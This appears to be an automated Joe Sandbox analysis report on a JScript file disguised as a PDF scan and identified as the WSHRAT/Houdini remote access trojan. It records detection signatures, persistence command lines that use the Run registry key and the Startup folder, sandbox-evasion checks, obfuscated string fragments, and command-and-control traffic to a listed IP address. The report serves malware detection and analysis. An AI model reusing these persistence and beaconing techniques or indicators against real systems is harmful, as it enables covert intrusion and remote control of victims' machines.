Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan_Revised-SOP_MCA_pdf.js

Overview

General Information

Sample name:Scan_Revised-SOP_MCA_pdf.js
Analysis ID:1534155
MD5:2096293c16f715b0246fc2aea41499d1
SHA1:a642e81761a8cd6c7f0226395ef96a99760ad797
SHA256:e7c8bb8d112595f63ee19c4fc0f874322578e1a9bfbf180d182c6fe5d07e0221
Tags:jsuser-abuse_ch
Infos:

Detection

WSHRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

JScript performs obfuscated calls to suspicious functions
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Register Wscript In Run Key
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected WSHRAT
Creates autostart registry keys with suspicious names
Drops script or batch files to the startup folder
JavaScript source code contains functionality to check for volume information
JavaScript source code contains functionality to compute date of execution (likely for evasion)
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (surpress errors)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Found WSH timer for Javascript or VBS script (likely evasive script)
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • wscript.exe (PID: 5428 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • wscript.exe (PID: 1916 cmdline: "C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 1588 cmdline: "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 4240 cmdline: "C:\Windows\system32\WScript.exe" //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 3968 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Houdini, WSHRATHoudini is a VBS-based RAT dating back to 2013. Past in the days, it used to be wrapped in an .exe but started being spamvertized or downloaded by other malware directly as .vbs in 2018. In 2019, WSHRAT appeared, a Javascript-based version of Houdini, recoded by the name of Kognito.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.houdini
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_WSHRATYara detected WSHRATJoe Security

    System Summary

    barindex
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 91.92.243.39, DestinationIsIpv6: false, DestinationPort: 9334, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1916, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 59389
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", ProcessId: 5428, ProcessName: wscript.exe
    Source: File createdAuthor: Tim Shelton: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5428, TargetFilename: C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 91.92.243.39, DestinationIsIpv6: false, DestinationPort: 9334, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 1916, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 59389
    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan_Revised-SOP_MCA_pdf.js", ProcessId: 5428, ProcessName: wscript.exe

    Data Obfuscation

    barindex
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\wscript.exe, ProcessId: 5428, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Scan_Revised-SOP_MCA_pdf.js

    Persistence and Installation Behavior

    barindex
    Source: Registry Key setAuthor: Joe Security: Data: Details: WScript.exe //B "C:\Users\user\AppData\Roaming\Scan_Revised-SOP_MCA_pdf.js", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 5428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Scan_Revised-SOP_MCA_pdf
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-15T16:38:51.387265+020020179941Malware Command and Control Activity Detected192.168.2.75939091.92.243.399334TCP
    2024-10-15T16:40:56.347026+020020179941Malware Command and Control Activity Detected192.168.2.75938991.92.243.399334TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-15T16:38:51.387265+020020175161Malware Command and Control Activity Detected192.168.2.75939091.92.243.399334TCP
    2024-10-15T16:40:56.347026+020020175161Malware Command and Control Activity Detected192.168.2.75938991.92.243.399334TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: Scan_Revised-SOP_MCA_pdf.jsReversingLabs: Detection: 13%
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior

    Software Vulnerabilities

    barindex
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', '"WScript.shell",""', '"Scripting.FileSystemObject"', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['"WScript.shell"', 'a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W', 'a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x7', '"WScript.shell",""', '"a%b%c%d%e%f%g%h%i%Ex%j%k%l%m%n%o%p%q%r%s%t%u%v%w%x%y%z%A%B%C%D%E%F%G%H%I%J%K%L%M%N%O%P%Q%R%S%T%U%V%', '"Scripting.FileSystemObject"', '"a\\x7fb\\x7fc\\x7fd\\x7fe\\x7ff\\x7fg\\x7fh\\x7fi\\x7fEx\\x7fj\\x7fk\\x7fl\\x7fm\\x7fn\\x7fo\\x7fp\\x7fq\\x7fr\\x7fs\\x', '"Scripting.FileSystemObject",""']

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.7:59389 -> 91.92.243.39:9334
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.7:59389 -> 91.92.243.39:9334
    Source: Network trafficSuricata IDS: 2017516 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1 : 192.168.2.7:59390 -> 91.92.243.39:9334
    Source: Network trafficSuricata IDS: 2017994 - Severity 1 - ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA : 192.168.2.7:59390 -> 91.92.243.39:9334
    Source: C:\Windows\System32\wscript.exeNetwork Connect: 91.92.243.39 9334Jump to behavior
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"user-agent:",""', '"user-agent"', '"user-agent:"', '"user-agent",":"']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsReturn value : ['"is-sending",""', '"is-sendin"', '"is-sending"', '"is-send","i"', '"is-sendi","n"', '"is-sendi"', '"is-send"', '"is-sendin","g"']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
    Source: Scan_Revised-SOP_MCA_pdf.jsArgument value : ['a,b,c,d,e,f,g,h,i,Ex,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W']
